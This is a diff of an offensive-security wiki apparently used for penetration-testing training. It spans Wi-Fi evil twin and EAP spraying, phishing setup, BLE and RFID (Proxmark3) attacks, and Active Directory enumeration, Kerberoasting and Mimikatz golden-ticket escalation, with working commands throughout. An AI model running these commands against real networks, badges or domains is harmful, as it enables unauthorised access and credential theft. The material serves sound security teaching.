Even using one of the most secure of authentication methods: **PEAP-EAP-TLS**, it is possible to **capture the username sent in the EAP protocol**. To do so, **capture a authentication communication** (start `airodump-ng` inside a channel and `wireshark` in the same interface) and filter the packets by`eapol`.\ Even using one of the most secure of authentication methods: **PEAP-EAP-TLS**, it is possible to **capture the username sent in the EAP protocol**. To do so, **capture a authentication communication** (start `airodump-ng` inside a channel and `wireshark` in the same interface) and filter the packets by`eapol`.\
Inside the "**Response, Identity**" packet, the **username** of the client will appear. Inside the "**Response, Identity**" packet, the **username** of the client will appear.
![](<../../../.gitbook/assets/image (150).png>) ![](<../../.gitbook/assets/image (150).png>)
### Anonymous Identities ### Anonymous Identities
@ -423,13 +447,13 @@ With either protocol, the PEAP/TTLS server learns the users true identity onc
If the client is expected to use a **username and password** (notice that **EAP-TLS won't be valid** in this case), then you could try to get a **list** a **usernames** (see next part) and **passwords** and try to **bruteforce** the access using [**air-hammer**](https://github.com/Wh1t3Rh1n0/air-hammer)**.** If the client is expected to use a **username and password** (notice that **EAP-TLS won't be valid** in this case), then you could try to get a **list** a **usernames** (see next part) and **passwords** and try to **bruteforce** the access using [**air-hammer**](https://github.com/Wh1t3Rh1n0/air-hammer)**.**
``` ```bash
./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt ./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt
``` ```
You could also do this attack using `eaphammer`: You could also do this attack using `eaphammer`:
``` ```bash
./eaphammer --eap-spray \ ./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \ --interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \ --essid example-wifi \
@ -535,7 +559,7 @@ hostapd ./hostapd.conf
### Forwarding and Redirection ### Forwarding and Redirection
``` ```bash
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward echo 1 > /proc/sys/net/ipv4/ip_forward
@ -563,7 +587,7 @@ You could also create an Evil Twin using **eaphammer** (notice that to create ev
Or using Airgeddon: `Options: 5,6,7,8,9 (inside Evil Twin attack menu).` Or using Airgeddon: `Options: 5,6,7,8,9 (inside Evil Twin attack menu).`
![](<../../../.gitbook/assets/image (148).png>) ![](<../../.gitbook/assets/image (148).png>)
Please, notice that by default if an ESSID in the PNL is saved as WPA protected, the device won't connect automatically to an Open evil Twin. You can try to DoS the real AP and hope that the user will connect manually to your Open evil twin, or you could DoS the real AP an use a WPA Evil Twin to capture the handshake (using this method you won't be able to let the victim connect to you as you don't know the PSK, but you can capture the handshake and try to crack it). Please, notice that by default if an ESSID in the PNL is saved as WPA protected, the device won't connect automatically to an Open evil Twin. You can try to DoS the real AP and hope that the user will connect manually to your Open evil twin, or you could DoS the real AP an use a WPA Evil Twin to capture the handshake (using this method you won't be able to let the victim connect to you as you don't know the PSK, but you can capture the handshake and try to crack it).
@ -627,7 +651,7 @@ Or you could also use:
`Airgeddon` can use previously generated certificated to offer EAP authentication to WPA/WPA2-Enterprise networks. The fake network will downgrade the connection protocol to EAP-MD5 so it will be able to **capture the user and the MD5 of the password**. Later, the attacker can try to crack the password.\ `Airgeddon` can use previously generated certificated to offer EAP authentication to WPA/WPA2-Enterprise networks. The fake network will downgrade the connection protocol to EAP-MD5 so it will be able to **capture the user and the MD5 of the password**. Later, the attacker can try to crack the password.\
`Airggedon` offers you the possibility of a **continuous Evil Twin attack (noisy)** or **only create the Evil Attack until someone connects (smooth).** `Airggedon` offers you the possibility of a **continuous Evil Twin attack (noisy)** or **only create the Evil Attack until someone connects (smooth).**
![](<../../../.gitbook/assets/image (129).png>) ![](<../../.gitbook/assets/image (129).png>)
### Debugging PEAP and EAP-TTLS TLS tunnels in Evil Twins attacks ### Debugging PEAP and EAP-TTLS TLS tunnels in Evil Twins attacks
@ -642,11 +666,11 @@ Now or later (when you have already captured some authentication intents) you ca
Add a new entry and fill the form with this values: **IP address = any** -- **Port = 0** -- **Protocol = data** -- **Key File** (**select your key file**, to avoid problems select a key file **without being password protected**). Add a new entry and fill the form with this values: **IP address = any** -- **Port = 0** -- **Protocol = data** -- **Key File** (**select your key file**, to avoid problems select a key file **without being password protected**).
![](<../../../.gitbook/assets/image (151).png>) ![](<../../.gitbook/assets/image (151).png>)
And look at the new **"Decrypted TLS" tab**: And look at the new **"Decrypted TLS" tab**:
![](<../../../.gitbook/assets/image (152).png>) ![](<../../.gitbook/assets/image (152).png>)
## KARMA, MANA, Loud MANA and Known beacons attack ## KARMA, MANA, Loud MANA and Known beacons attack
@ -654,7 +678,7 @@ And look at the new **"Decrypted TLS" tab**:
The following table lists the different type of MFACLs (Management Frame Access Control Lists) available, as well their effects when used: The following table lists the different type of MFACLs (Management Frame Access Control Lists) available, as well their effects when used:
![](<../../../.gitbook/assets/image (149).png>) ![](<../../.gitbook/assets/image (149).png>)
``` ```
# example EAPHammer MFACL file, wildcards can be used # example EAPHammer MFACL file, wildcards can be used
@ -729,20 +753,17 @@ As known beacons are loud. You can use a script inside Eaphammer project to just
--burst-count 5 --burst-count 5
``` ```
## Other tools ## Wi-Fi Direct
### [Wifite2](https://github.com/derv82/wifite2) Wi-Fi Direct is a Wi-Fi standard that allows devices to connect to each other without a wireless AP as one of the two devices will act as AP (called group owner). You can find Wi-Fi Direct in a lot of IoT devices like printers, TVs...
This tool automates **WPS/WEP/WPA-PSK** attacks. It will automatically: Wi-Fi Direct relies on Wi-Fi Protected Setup (**WPS**) to securely connect the devices. WPS has multiple configuration methods such as **Push-Button** Configuration (PBC), **PIN entry**, and **Near-Field** Communication (NFC)
* Set the interface in monitor mode So the attacks previously seen to WPS PIN are also valid here if PIN is used.
* Scan for possible networks - And let you select the victim(s)
* If WEP - Launch WEP attacks ### EvilDirect Hijacking
* If WPA-PSK
* If WPS: Pixie dust attack and the bruteforce attack (be careful the brute-force attack could take a long time). Notice that it doesn't try null PIN or database/generated PINs. This works like an Evil-Twin but for Wi-Fi direct, you can impersonate a group owner to try to make other devices like phons connect to you: `airbase-ng -c 6 -e DIRECT-5x-BRAVIA -a BB:BB:BB:BB:BB:BB mon0`
* Try to capture the PMKID from the AP to crack it
* Try to deauthenticate clients of the AP to capture a handshake
* If PMKID or Handshake, try to bruteforce using top5000 passwords.
## Interesting links ## Interesting links

View file

@ -333,7 +333,7 @@ The page www.mail-tester.com can indicate you if you your domain is being blocke
* Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._ * Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._
* You can leave blank the username and password, but make sure to check the Ignore Certificate Errors * You can leave blank the username and password, but make sure to check the Ignore Certificate Errors
![](<../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (5).png>) ![](<../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (2) (4).png>)
{% hint style="info" %} {% hint style="info" %}
It's recommended to use the "**Send Test Email**" functionality to test that everything is working.\ It's recommended to use the "**Send Test Email**" functionality to test that everything is working.\

View file

@ -144,6 +144,8 @@ Backup iKat versions:
[http://swin.es/k/](http://swin.es/k/)\ [http://swin.es/k/](http://swin.es/k/)\
[http://www.ikat.kronicd.net/](http://www.ikat.kronicd.net)\ [http://www.ikat.kronicd.net/](http://www.ikat.kronicd.net)\
Create a common dialog using JavaScript and access file explorer: `document.write('<input/type=file>')`
Source: https://medium.com/@Rend_/give-me-a-browser-ill-give-you-a-shell-de19811defa0
## iPad ## iPad

2
radio-hacking/README.md Normal file
View file

@ -0,0 +1,2 @@
# Radio Hacking

View file

@ -0,0 +1,69 @@
# Pentesting BLE - Bluetooth Low Energy
## Introduction
Available since the Bluetooth 4.0 specification, BLE uses only 40 channels, covering the range of 2400 to 2483.5 MHz. In contrast, traditional Bluetooth uses 79 channels in that same range.
BLE devices communicate is by sending **advertising packets** (**beacons**), these packets broadcast the BLE devices existence to other nearby devices. These beacons sometimes **send data**, too.
The listening device, also called a central device, can respond to an advertising packet with a **SCAN request** sent specifically to the advertising device. The **response** to that scan uses the same structure as the **advertising** packet with additional information that couldnt fit on the initial advertising request, such as the full device name.
![](<../../.gitbook/assets/image (201).png>)
The preamble byte synchronizes the frequency, whereas the four-byte access address is a **connection identifier**, which is used in scenarios where multiple devices are trying to establish connections on the same channels. Next, the Protocol Data Unit (**PDU**) contains the **advertising data**. There are several types of PDU; the most commonly used are ADV\_NONCONN\_IND and ADV\_IND. Devices use the **ADV\_NONCONN\_IND** PDU type if they **dont accept connections**, transmitting data only in the advertising packet. Devices use **ADV\_IND** if they **allow connections** and **stop sending advertising** packets once a **connection** has been **established**.
### GATT
The **Generic Attribute Profile** (GATT) defines how the **device should format and transfer data**. When youre analyzing a BLE devices attack surface, youll often concentrate your attention on the GATT (or GATTs), because its how **device functionality gets triggered** and how data gets stored, grouped, and modified. The GATT lists a devices characteristics, descriptors, and services in a table as either 16- or 32-bits values. A **characteristic** is a **data** value **sent** between the central device and peripheral. These characteristics can have **descriptors** that **provide additional information about them**. **Characteristics** are often **grouped** in **services** if theyre related to performing a particular action.
## Enumeration
```bash
hciconfig #Check config, check if UP or DOWN
# If DOWN try:
sudo modprobe -c bluetooth
sudo hciconfig hci0 down && sudo hciconfig hci0 up
# Spoof MAC
spooftooph -i hci0 -a 11:22:33:44:55:66
```
### GATTool
**GATTool** allows to **establish** a **connection** with another device, listing that devices **characteristics**, and reading and writing its attributes.\
GATTTool can launch an interactive shell with the `-I` option:
```bash
gatttool -i hci0 -I
[ ][LE]> connect 24:62:AB:B1:A8:3E Attempting to connect to A4:CF:12:6C:B3:76 Connection successful
[A4:CF:12:6C:B3:76][LE]> characteristics
handle: 0x0002, char properties: 0x20, char value handle:
0x0003, uuid: 00002a05-0000-1000-8000-00805f9b34fb
handle: 0x0015, char properties: 0x02, char value handle:
0x0016, uuid: 00002a00-0000-1000-8000-00805f9b34fb
[...]
# Write data
gatttool -i <Bluetooth adapter interface> -b <MAC address of device> --char-write-req <characteristic handle> -n <value>
gatttool -b a4:cf:12:6c:b3:76 --char-write-req -a 0x002e -n $(echo -n "04dc54d9053b4307680a"|xxd -ps)
# Read data
gatttool -i <Bluetooth adapter interface> -b <MAC address of device> --char-read -a 0x16
# Read connecting with an authenticated encrypted connection
gatttool --sec-level=high -b a4:cf:12:6c:b3:76 --char-read -a 0x002c
```
### Bettercap
```bash
# Start listening for beacons
sudo bettercap --eval "ble.recon on"
# Wait some time
>> ble.show # Show discovered devices
>> ble.enum <mac addr> # This will show the service, characteristics and properties supported
# Write data in a characteristic
>> ble.write <MAC ADDR> <UUID> <HEX DATA>
>> ble.write <mac address of device> ff06 68656c6c6f # Write "hello" in ff06
```

View file

@ -0,0 +1,94 @@
# Pentesting RFID
## Introduction
**Radio Frequency Identification (RFID)** is the most popular short-range radio solution. It's usually used to store and transmit information that identifies an entity.
An RFID tag can rely on **its own power source (active)**, such as an embedded battery, or receive its power from the reading antenna using the current **induced from the received radio waves** (**passive**).
### Classes
EPCglobal divides RFID tags into six categories. A tag in each category has all the capabilities listed in the previous category, making it backward compatible.
* **Class 0** tags are **passive** tags that operate in **UHF** bands. The vendor **preprograms** them at the production factory. As a result, you **cant change** the information stored in their memory.
* **Class 1** tags can also operate in **HF** bands. In addition, they can be **written only once** after production. Many Class 1 tags can also process **cyclic redundancy checks** (CRCs) of the commands they receive. CRCs are a few extra bytes at the end of the commands for error detection.
* **Class 2** tags can be **written multiple times**.
* **Class 3** tags can contain **embedded sensors** that can record environmental parameters, such as the current temperature or the tags motion. These tags are **semi-passive**, because although they **have** an embedded power source, such as an integrated **battery**, they **cant initiate** wireless **communication** with other tags or readers.
* **Class 4** tags can initiate communication with other tags of the same class, making them **active tags**.
* **Class 5** tags can provide **power to other tags and communicate with all the previous tag** classes. Class 5 tags can act as **RFID readers**.
### Information Stored in RFID Tags
An RFID tags memory usually stores four kinds of data: the **identification data**, which **identifies** the **entity** to which the tag is attached (this data includes user-defined fields, such as bank accounts); the **supplementary data**, which provides **further** **details** regarding the entity; the **control data**, used for the tags internal **configuration**; and the tags **manufacturer data**, which contains a tags Unique Identifier (**UID**) and details regarding the tags **production**, **type**, and **vendor**. Youll find the first two kinds of data in all the commercial tags; the last two can differ based on the tags vendor.
The ISO standard specifies the Application Family Identifier (**AFI**) value, a code that indicates the **kind of object** the tag belongs to. Another important register, also specified by ISO, is the Data Storage Format Identifier(**DSFID**), which defines the **logical organization of the user data**.
Most RFID **security controls** have mechanisms that **restrict** the **read** or **write** operations on each user memory block and on the special registers containing the AFI and DSFID values. These **lock** **mechanisms** use data stored in the control memory and have **default passwords** preconfigured by the vendor but allow the tag owners to **configure custom passwords**.
### Low-Frequency RFID Tags
For example key cards that employees use to open doors. These devices rely on **passive** **RFID** technology and operate in a **range of 30 kHz to 300 kHz**, although it's more usual to use 125 kHz to 134 kHz.
### High-Frequency RFID Tags
Many people refer to this technology as **Near Field Communication (NFC)**, a term for devices operating over the 13.56 MHz frequency.
## Attacking RFID Systems with Proxmark3
The first thing you need to do is to have a [**Proxmark3**](https://proxmark.com) and [**install the software and it's dependencie**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux)****[**s**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux).
### Attacking MIFARE Classic 1KB
It has **16 sectors**, each of them has **4 blocks** and each block contains **16B**. The UID is in sector 0 block 0 (and can't be altered).\
To access each sector you need **2 keys** (**A** and **B**) which are stored in **block 3 of each sector** (sector trailer). The sector trailer also stores the **access bits** that give the **read and write** permissions on **each block** using the 2 keys.\
2 keys are useful to give permissions to read if you know the first one and write if you know the second one (for example).
Several attacks can be performed
```bash
proxmark3> hf mf #List attacks
proxmark3> hf mf chk *1 ? t ./client/default_keys.dic #Keys bruteforce
proxmark3> hf mf fchk 1 t # Improved keys BF
proxmark3> hf mf rdbl 0 A FFFFFFFFFFFF # Read block 0 with the key
proxmark3> hf mf rdsc 0 A FFFFFFFFFFFF # Read sector 0 with the key
proxmark3> hf mf dump 1 # Dump the information of the card (using creds inside dumpkeys.bin)
proxmark3> hf mf restore # Copy data to a new card
proxmark3> hf mf eload hf-mf-B46F6F79-data # Simulate card using dump
proxmark3> hf mf sim *1 u 8c61b5b4 # Simulate card using memory
proxmark3> hf mf eset 01 000102030405060708090a0b0c0d0e0f # Write those bytes to block 1
proxmark3> hf mf eget 01 # Read block 1
proxmark3> hf mf wrbl 01 B FFFFFFFFFFFF 000102030405060708090a0b0c0d0e0f # Write to the card
```
The Proxmark3 allows to perform other actions like **eavesdropping** a **Tag to Reader communication** to try to find sensitive data. In this card you could just sniff the communication with and calculate the used key because the **cryptographic operations used are weak** and knowing the plain and cipher text you can calculate it (`mfkey64` tool).
### Raw Commands
IoT systems sometimes use **nonbranded or noncommercial tags**. In this case, you can use Proxmark3 to send custom **raw commands to the tags**.
```bash
proxmark3> hf search UID : 80 55 4b 6c ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
No chinese magic backdoor command detected
Prng detection: WEAK
Valid ISO14443A Tag Found - Quiting Search
```
With this information you could try to search information about the card and about the way to communicate with it. Proxmark3 allows to send raw commands like: `hf 14a raw -p -b 7 26`
### Scripts
The Proxmark3 software comes with a preloaded list of **automation scripts** that you can use to perform simple tasks. To retrieve the full list, use the `script list` command. Next, use the `script run` command, followed by the scripts name:
```
proxmark3> script run mfkeys
```
You can create a script to **fuzz tag readers**, so copying the data of a **valid card** just write a **Lua script** that **randomize** one or more random **bytes** and check if the **reader crashes** with any iteration.

View file

@ -18,7 +18,7 @@ Main concepts of an Active Directory:
1. **Directory** Contains all the information about the objects of the Active directory 1. **Directory** Contains all the information about the objects of the Active directory
2. **Object** An object references almost anything inside the directory (a user, group, shared folder...) 2. **Object** An object references almost anything inside the directory (a user, group, shared folder...)
3. **Domain** The objects of the directory are contained inside the domain. Inside a "forest" more than one domain can exist and each of them will have their own objects collection.&#x20; 3. **Domain** The objects of the directory are contained inside the domain. Inside a "forest" more than one domain can exist and each of them will have their own objects collection.
4. **Tree** Group of domains with the same root. Example: _dom.local, email.dom.local, www.dom.local_ 4. **Tree** Group of domains with the same root. Example: _dom.local, email.dom.local, www.dom.local_
5. **Forest** The forest is the highest level of the organization hierarchy and is composed by a group of trees. The trees are connected by trust relationships. 5. **Forest** The forest is the highest level of the organization hierarchy and is composed by a group of trees. The trees are connected by trust relationships.
@ -52,7 +52,7 @@ If you just have access to an AD environment but you don't have any credentials/
* `enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>` * `enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>`
* `smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>` * `smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>`
* `smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //` * `smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //`
* [**A more detailed guide on how to enumerate a SMB server can be found here.**](broken-reference) * [**A more detailed guide on how to enumerate a SMB server can be found here.**](broken-reference/)
* **Enumerate Ldap**: * **Enumerate Ldap**:
* `nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>` * `nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>`
* [**A more detailed guide on how to enumerate LDAP can be found here.**](../../pentesting/pentesting-ldap.md) * [**A more detailed guide on how to enumerate LDAP can be found here.**](../../pentesting/pentesting-ldap.md)
@ -60,16 +60,16 @@ If you just have access to an AD environment but you don't have any credentials/
* Gather credentials [**impersonating services with Responder**](../../pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) * Gather credentials [**impersonating services with Responder**](../../pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
* Access host by [abusing the relay attack](../../pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack) * Access host by [abusing the relay attack](../../pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack)
* Gather credentials **exposing** [**fake UPnP services with evil-S**](../../pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md)[**SDP**](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856) * Gather credentials **exposing** [**fake UPnP services with evil-S**](../../pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md)[**SDP**](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856)
* [**OSINT**](https://book.hacktricks.xyz/external-recon-methodology): * [**OSINT**](https://book.hacktricks.xyz/external-recon-methodology):
* Extract usernames/names from internal documents, social media, services (mainly web) inside the domain environments and also from the publicly available. * Extract usernames/names from internal documents, social media, services (mainly web) inside the domain environments and also from the publicly available.
* If you find the complete names of company workers, you could try different AD **username conventions ([**read this**](https://activedirectorypro.com/active-directory-user-naming-convention/)**). The most common conventions are: _NameSurname_, _Name.Surname_, _NamSur_ (3letters of each), _Nam.Sur_, _NSurname_, _N.Surname_, _SurnameName_, _Surname.Name_, _SurnameN_, _Surname.N_, 3 _random letters and 3 random numbers_ (abc123). * If you find the complete names of company workers, you could try different AD **username conventions (**[**read this**](https://activedirectorypro.com/active-directory-user-naming-convention/)). The most common conventions are: _NameSurname_, _Name.Surname_, _NamSur_ (3letters of each), _Nam.Sur_, _NSurname_, _N.Surname_, _SurnameName_, _Surname.Name_, _SurnameN_, _Surname.N_, 3 _random letters and 3 random numbers_ (abc123).
* Tools: * Tools:
* [w0Tx/generate-ad-username](https://github.com/w0Tx/generate-ad-username) * [w0Tx/generate-ad-username](https://github.com/w0Tx/generate-ad-username)
* [urbanadventurer/username-anarchy](https://github.com/urbanadventurer/username-anarchy) * [urbanadventurer/username-anarchy](https://github.com/urbanadventurer/username-anarchy)
### User enumeration ### User enumeration
When an **invalid username is requested** the server will respond using the **Kerberos error** code *KRB5KDC\_ERR\_C\_PRINCIPAL\_UNKNOWN*, allowing us to determine that the username was invalid. **Valid usernames** will illicit either the **TGT in a AS-REP** response or the error *KRB5KDC\_ERR\_PREAUTH\_REQUIRED*, indicating that the user is required to perform pre-authentication. When an **invalid username is requested** the server will respond using the **Kerberos error** code _KRB5KDC\_ERR\_C\_PRINCIPAL\_UNKNOWN_, allowing us to determine that the username was invalid. **Valid usernames** will illicit either the **TGT in a AS-REP** response or the error _KRB5KDC\_ERR\_PREAUTH\_REQUIRED_, indicating that the user is required to perform pre-authentication.
``` ```
./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
@ -83,13 +83,12 @@ crackmapexec smb dominio.es -u '' -p '' --users | awk '{print $4}' | uniq
Ok, so you know you have already a valid username but no passwords... Then try: Ok, so you know you have already a valid username but no passwords... Then try:
* [**ASREPRoast**](asreproast.md): If a user **doesn't have** the attribute *DONT\_REQ\_PREAUTH* you can **request a AS\_REP message** for that user that will contain some data encrypted by a derivation of the password of the user. * [**ASREPRoast**](asreproast.md): If a user **doesn't have** the attribute _DONT\_REQ\_PREAUTH_ you can **request a AS\_REP message** for that user that will contain some data encrypted by a derivation of the password of the user.
* [**Password Spraying**](password-spraying.md): Let's try the most **common passwords** with each of the discovered users, maybe some user is using a bad password (keep in mind the password policy!) or could login with empty password: [Invoke-SprayEmptyPassword.ps1](https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-SprayEmptyPassword.ps1). * [**Password Spraying**](password-spraying.md): Let's try the most **common passwords** with each of the discovered users, maybe some user is using a bad password (keep in mind the password policy!) or could login with empty password: [Invoke-SprayEmptyPassword.ps1](https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-SprayEmptyPassword.ps1).
## Enumerating Active Directory WITH credentials/session ## Enumerating Active Directory WITH credentials/session
For this phase you need to have **compromised the credentials or a session of a valid domain account.** For this phase you need to have **compromised the credentials or a session of a valid domain account.** If you have some valid credentials or a shell as a domain user, **you should remember that the options given before are still options to compromise other users**.
If you have some valid credentials or a shell as a domain user, **you should remember that the options given before are still options to compromise other users**.
### Enumeration ### Enumeration
@ -99,11 +98,11 @@ It's very easy to obtain all the domain usernames from Windows (`net user /domai
Having compromised an account is a **big step to start compromising the whole domain**, because you are going to be able to start the **Active Directory Enumeration:** Having compromised an account is a **big step to start compromising the whole domain**, because you are going to be able to start the **Active Directory Enumeration:**
Regarding [**ASREPRoast**](asreproast.md)you can now find every possible vulnerable user, and regarding [**Password Spraying**](password-spraying.md) you can get a **list of all the usernames** and try the password of the compromised account, empty passwords and new promising passwords. Regarding [**ASREPRoast**](asreproast.md)you can now find every possible vulnerable user, and regarding [**Password Spraying**](password-spraying.md) you can get a **list of all the usernames** and try the password of the compromised account, empty passwords and new promising passwords.
* You could use some[Windows binaries from the CMD to perform a basic recon](../basic-cmd-for-pentesters.md#domain-info), but using [powershell for recon](../basic-powershell-for-pentesters/) will probably be stealthier, and you could even [**use powerview**](../basic-powershell-for-pentesters/powerview.md) **to extract more detailed information**. Always **learn what a CMD or powershell/powerview command does** before executing it, this way you will know **how stealth are you being**. * You could use some[Windows binaries from the CMD to perform a basic recon](../basic-cmd-for-pentesters.md#domain-info), but using [powershell for recon](../basic-powershell-for-pentesters/) will probably be stealthier, and you could even [**use powerview**](../basic-powershell-for-pentesters/powerview.md) **to extract more detailed information**. Always **learn what a CMD or powershell/powerview command does** before executing it, this way you will know **how stealth are you being**.
* Another amazing tool for recon in an active directory is [**BloodHound**](bloodhound.md). It is **not very stealthy** (depending on the collection methods you use), but **if you don't care** about that, you should totally give it a **try**. Find where users can RDP, find path to other groups, etc. * Another amazing tool for recon in an active directory is [**BloodHound**](bloodhound.md). It is **not very stealthy** (depending on the collection methods you use), but **if you don't care** about that, you should totally give it a **try**. Find where users can RDP, find path to other groups, etc.
* Look in the LDAP database, with **ldapsearch** or **AdExplorer.exe** to look for credentials in fields *userPassword* & *unixUserPassword*, or even for *Description*. * Look in the LDAP database, with **ldapsearch** or **AdExplorer.exe** to look for credentials in fields _userPassword_ & _unixUserPassword_, or even for _Description_.
* If you are using **Linux**, you could also enumerate the domain using [the-useless-one/pywerview](https://github.com/the-useless-one/pywerview). * If you are using **Linux**, you could also enumerate the domain using [the-useless-one/pywerview](https://github.com/the-useless-one/pywerview).
* You could also try automated tools as: * You could also try automated tools as:
* [tomcarver16/ADSearch](https://github.com/tomcarver16/ADSearch) * [tomcarver16/ADSearch](https://github.com/tomcarver16/ADSearch)
@ -113,9 +112,7 @@ Regarding [**ASREPRoast**](asreproast.md)you can now find every possible vulnera
### **Kerberoast** ### **Kerberoast**
The goal of Kerberoasting is to harvest **TGS tickets for services that run on behalf of domain user accounts**, not computer accounts. Thus, part of these TGS tickets are **encrypted wit keys derived from user passwords**. As a consequence, their credentials could be **cracked offline**. The goal of Kerberoasting is to harvest **TGS tickets for services that run on behalf of domain user accounts**, not computer accounts. Thus, part of these TGS tickets are **encrypted wit keys derived from user passwords**. As a consequence, their credentials could be **cracked offline**. You can know that a **user account** is being used as a **service** because the property **"ServicePrincipalName"** is **not null**. **Find more information about this attack** [**in the Kerberoast page**](kerberoast.md)**.**
You can know that a **user account** is being used as a **service** because the property **"ServicePrincipalName"** is **not null**.
**Find more information about this attack [**in the Kerberoast page**](kerberoast.md).**
### Remote connexion (RDP, SSH, FTP, Win-RM, etc) ### Remote connexion (RDP, SSH, FTP, Win-RM, etc)
@ -219,7 +216,7 @@ And if someone tries to delete this user from the Domain Admins (for example) in
### **DSRM Credentials** ### **DSRM Credentials**
There is a **local administrator** account inside each **DC**. Having admin privileges in this machine, you can use mimikatz to **dump the local Administrator hash**. Then, modifying a registry to **activate this password** so you can remotely access to this local Administrator user.\ There is a **local administrator** account inside each **DC**. Having admin privileges in this machine, you can use mimikatz to **dump the local Administrator hash**. Then, modifying a registry to **activate this password** so you can remotely access to this local Administrator user.\
[**More information about DSRM Credentials here.**](dsrm-credentials.md)**** [**More information about DSRM Credentials here.**](dsrm-credentials.md)\*\*\*\*
### **ACL Persistence** ### **ACL Persistence**
@ -246,7 +243,7 @@ You can create you **own SSP** to **capture** in **clear text** the **credential
It registers a **new Domain Controller** in the AD and uses it to **push attributes** (SIDHistory, SPNs...) on specified objects **without** leaving any **logs** regarding the **modifications**. You **need DA** privileges and be inside the **root domain**.\ It registers a **new Domain Controller** in the AD and uses it to **push attributes** (SIDHistory, SPNs...) on specified objects **without** leaving any **logs** regarding the **modifications**. You **need DA** privileges and be inside the **root domain**.\
Note that if you use wrong data, pretty ugly logs will appear.\ Note that if you use wrong data, pretty ugly logs will appear.\
[**More information about DCShadow here.**](dcshadow.md)**** [**More information about DCShadow here.**](dcshadow.md)\*\*\*\*
## **Forest Privilege Escalation -** Domain Trusts ## **Forest Privilege Escalation -** Domain Trusts
@ -283,7 +280,7 @@ A trust relationship can also be **transitive** (A trust B, B trust C, then A tr
1. **Enumerate** the trusting relationships 1. **Enumerate** the trusting relationships
2. Check if any **security principal** (user/group/computer) has **access** to resources of the **other domain**, maybe by ACE entries or by being in groups of the other domain. Look for **relationships across domains** (the trust was created for this probably). 2. Check if any **security principal** (user/group/computer) has **access** to resources of the **other domain**, maybe by ACE entries or by being in groups of the other domain. Look for **relationships across domains** (the trust was created for this probably).
1. kerberoast in this case could be another option. 1. kerberoast in this case could be another option.
3. **Compromise** the **accounts** which can **pivot** through domains.&#x20; 3. **Compromise** the **accounts** which can **pivot** through domains.
There are three **main** ways that security principals (users/groups/computer) from one domain can have access into resources in another foreign/trusting domain: There are three **main** ways that security principals (users/groups/computer) from one domain can have access into resources in another foreign/trusting domain:
@ -293,7 +290,7 @@ There are three **main** ways that security principals (users/groups/computer) f
### Child-to-Parent forest privilege escalation ### Child-to-Parent forest privilege escalation
Also, notice that there are **2 trusted keys**, one for _Child --> Parent_ and another one for P_arent --> Child_. Also, notice that there are **2 trusted keys**, one for _Child --> Parent_ and another one for P\_arent --> Child\_.
```bash ```bash
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.my.domain.local Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.my.domain.local
@ -312,7 +309,7 @@ Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarco
/ticket:C:\path\save\ticket.kirbi /ticket:C:\path\save\ticket.kirbi
``` ```
For finding the **SID** of the **"Enterprise Admins"** group you can find the **SID** of the **root domain** and set it in S-1-5-21_root domain_-519. For example, from root domain SID _S-1-5-21-280534878-1496970234-700767426_ the "Enterprise Admins"group SID is _S-1-5-21-280534878-1496970234-700767426-519_ For finding the **SID** of the **"Enterprise Admins"** group you can find the **SID** of the **root domain** and set it in S-1-5-21\_root domain\_-519. For example, from root domain SID _S-1-5-21-280534878-1496970234-700767426_ the "Enterprise Admins"group SID is _S-1-5-21-280534878-1496970234-700767426-519_
[http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/](http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/) [http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/](http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/)
